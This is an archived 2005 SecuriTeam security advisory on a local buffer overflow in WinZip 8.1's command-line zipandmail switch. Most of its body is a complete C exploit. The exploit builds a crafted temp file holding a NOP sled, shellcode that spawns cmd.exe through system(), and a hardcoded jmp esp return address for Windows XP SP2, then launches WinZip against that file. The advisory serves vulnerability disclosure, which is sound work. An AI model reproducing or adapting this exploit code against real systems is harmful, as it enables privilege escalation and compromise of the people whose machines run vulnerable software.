[EXPL] WinZip Local Buffer Overflow (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 06/09/05
- Previous message: SecuriTeam: "[TOOL] Tattle - Automatic Reporting Of SSH Brute-Force Attacks"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 9 Jun 2005 11:44:41 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
WinZip Local Buffer Overflow (Exploit)
------------------------------------------------------------------------
SUMMARY
<http://www.winzip.com/> WinZip is - "The original and most popular of
all Windows Zip file utilities."
By zipping a file with the zipandmail switch of WinZip command line tool,
a local user can gain elevated privileges by exploiting a buffer overflow
in the program.
DETAILS
Vulnerable Systems:
* WinZip version 8.1
Immune Systems:
* WinZip version 9.0 SR-1 (download <http://www.winzip.com/wz90sr1.htm>
here)
Exploit:
/*
*
* WinZip Command Line Local Buffer Overflow
* http://securitytracker.com/alerts/2004/Sep/1011132.html
* http://www.winzip.com/wz90sr1.htm
* Exploit coded By ATmaCA
* Web: atmacasoft.com && spyinstructors.com
* E-Mail: atmaca at icqmail
* Credit to kozan
*
*/
/*
*
* Tested with WinZip 8.1 on Win XP Sp2 En
* Bug Fixed on WinZip 9.0 Service Release 1 (SR-1)
* http://www.winzip.com/wz90sr1.htm
*
*/
#include <windows.h>
#include <stdio.h>
#define NOP 0x90
void main()
{
// create crafted command line
char tmpfile[] = "c:\\wzs45.tmp";
char winzippath[] = "C:\\Program Files\\WINZIP\\winzip32.exe";
char zipandmailpar[] = " -* /zipandmail /@ ";
char runpar[300];
int i = 0;
strcpy(runpar,winzippath);
strcat(runpar,zipandmailpar);
strcat(runpar,tmpfile);
// need for some input file name .tmp but not must to exist
char inputfile[] = "C:\\someinputfile.ext\n";
// launch a local cmd.exe
char shellcode[] =
"\x55\x8B\xEC\x33\xFF"
"\x57\x83\xEC\x04\xC6\x45\xF8"
"\x63\xC6\x45\xF9\x6D\xC6\x45"
"\xFA\x64\xC6\x45\xFB\x2E\xC6"
"\x45\xFC\x65\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65\xB8"
"\xC7\x93\xC2\x77" //77C293C7 system() - WinXP SP2 - msvcrt.dll
"\x50\x8D\x45\xF8\x50"
"\xFF\x55\xF4";
// create crafted .tmp file
FILE *di;
if( (di=fopen(tmpfile,"wb")) == NULL ){
return;
}
for(i=0;i<sizeof(inputfile)-1;i++)
fputc(inputfile[i],di);
fprintf(di,"c:\\");
for(i=0;i<384;i++)
fputc(NOP,di);
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],di);
fprintf(di,"\xBF\xAC\xDA\x77"); //EIP - WinXp Sp2 Eng - jmp esp
addr
fprintf(di,"\x90\x90\x90\x90"); //NOPs
fprintf(di,"\x90\x83\xEC\x74"); //sub esp,0x74
fprintf(di,"\xFF\xE4\x90\x90"); //jmp esp
fprintf(di,"\n");
fclose(di);
WinExec(runpar,SW_SHOW);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:atmaca@icqmail.com> ATmaCA.
The original article can be found at:
<http://securitytracker.com/alerts/2004/Sep/1011132.html>
http://securitytracker.com/alerts/2004/Sep/1011132.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[TOOL] Tattle - Automatic Reporting Of SSH Brute-Force Attacks"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
